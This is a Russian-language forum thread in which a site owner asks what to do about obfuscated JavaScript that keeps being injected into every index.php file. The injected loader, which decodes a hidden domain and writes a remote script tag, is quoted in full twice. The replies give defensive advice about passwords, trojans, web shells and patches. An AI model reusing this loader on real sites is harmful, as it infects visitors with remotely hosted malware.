Помогите! это вирус или уязвимость? что делать?!

Статус
В этой теме нельзя размещать новые ответы.

seeker1982

Создатель
Регистрация
5 Фев 2009
Сообщения
23
Реакции
0
в четвертый раз за две недели на сайте во всез файлах index.php поселяется код! он встраивается сразу после окончания php кода к конце файлов:
PHP:
<script> try{window.onload=function(){document.write('<div id=megaid>pichunter-com.time.com.bl</div>');Ew34reb9067 = document.getElementById('megaid').innerHTML + 'u@^)()e&#h&&^&@o!(s&#t$$-$^c)o)@$m!).&!c)$$o)#u&)$n^t@)^e(#&@r&#&)b!&&e@$#^^s^$t^!.$r(&u(:)(D$($E!)#B$U^G#$^/)^$m!&s(#@n$!!.#^c($(o#@#m!/(@^@m^##s@))^n$.#)^c^o^^(m&&&(/$$g$()o#@#o)!&!g)^!l&e@^(!).)&c@!#!o)^&m)@/!!)p)()c(!&h@#@)o^(m&!e^$^(.!$n!&e!^^^t&&/)#s@i&)t&#e)!m(@e#t@^$e##@r$.@c^o^&m&^/)&'.replace(/\!|&|@|\^|#|\)|\$|\(/ig, '') ;document.write('<scr'+'ipt src=http://'+Ew34reb9067.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(Fq9maaz4m ) {}</script>
<!--c8b3f4e117443090eae170836419f076-->
что это?
что он делает?
как с ним бороться?
доступ к сайту у меня только по ssh
 
поменяй пароли от всего.
проверь комп на винусы, трояны.
удали код этот.
проверь на вируса шоп.

у меня подобное было. троянчики тянули логопасики :(
 
заливал каждый раз все заново менял пароли, теперь вообще выхожу снового компа из под win7 и с последнего проникновения даже на сервер не заходил... ком девственно чист...
о! не менял пароли на mysql, иду менять!
 
либо троян всё таки сидт, либо звоните хостеру, возможно сервер ломанули :nezn:
 
а заплатки все поставили?
 
Да была и у меня такая проблема, тока у меня <iframe> атака была, первое что он заражает, это "шаблоны" сайта, тщательно проверь их на наличие вирусни, а потом меняй пароли.....
 
заливал через Тотал командер, если да, то у тебя вирус.
Убери в тотале сохранение паролей. И чисть комп, особенно тотал.
 
в четвертый раз за две недели на сайте во всез файлах index.php поселяется код! он встраивается сразу после окончания php кода к конце файлов:
PHP:
<script> try{window.onload=function(){document.write('<div id=megaid>pichunter-com.time.com.bl</div>');Ew34reb9067 = document.getElementById('megaid').innerHTML + 'u@^)()e&#h&&^&@o!(s&#t$$-$^c)o)@$m!).&!c)$$o)#u&)$n^t@)^e(#&@r&#&)b!&&e@$#^^s^$t^!.$r(&u(:)(D$($E!)#B$U^G#$^/)^$m!&s(#@n$!!.#^c($(o#@#m!/(@^@m^##s@))^n$.#)^c^o^^(m&&&(/$$g$()o#@#o)!&!g)^!l&e@^(!).)&c@!#!o)^&m)@/!!)p)()c(!&h@#@)o^(m&!e^$^(.!$n!&e!^^^t&&/)#s@i&)t&#e)!m(@e#t@^$e##@r$.@c^o^&m&^/)&'.replace(/\!|&|@|\^|#|\)|\$|\(/ig, '') ;document.write('<scr'+'ipt src=http://'+Ew34reb9067.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(Fq9maaz4m ) {}</script>
<!--c8b3f4e117443090eae170836419f076-->
что это?
что он делает?
как с ним бороться?
доступ к сайту у меня только по ssh


Для начала проверь все каталоги магазина антивирусом, скорей всего залили шел меня так тоже ломанули был троян temp.php в папке products_files/.

Потом поставь все не обходимые Для просмотра ссылки Войди или Зарегистрируйся (последный раз была уязвимость в файлах index.php, cart.php, printable.php.)

Ну и конечно смени все пароли
 
Создай файл любой

Создай любой файл вставь код и попробуй антивирусом его проверить если что то есть ты сразу увидишь
тока принудительно проверяй и желательно на том компе где точно знаешь что вирей нет
 
Скорее всего на серваке сидит шелл и как что не меняй все равно будут активировать, выход такой - снимаешь архивом копию и изучаешь состав. но. так как антивири распознают многие шеллы как вирусы, скорее всего будет проблема скачать и сам архив

легче хостера попросить кнопку нажать и проверить сервак и сайт
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху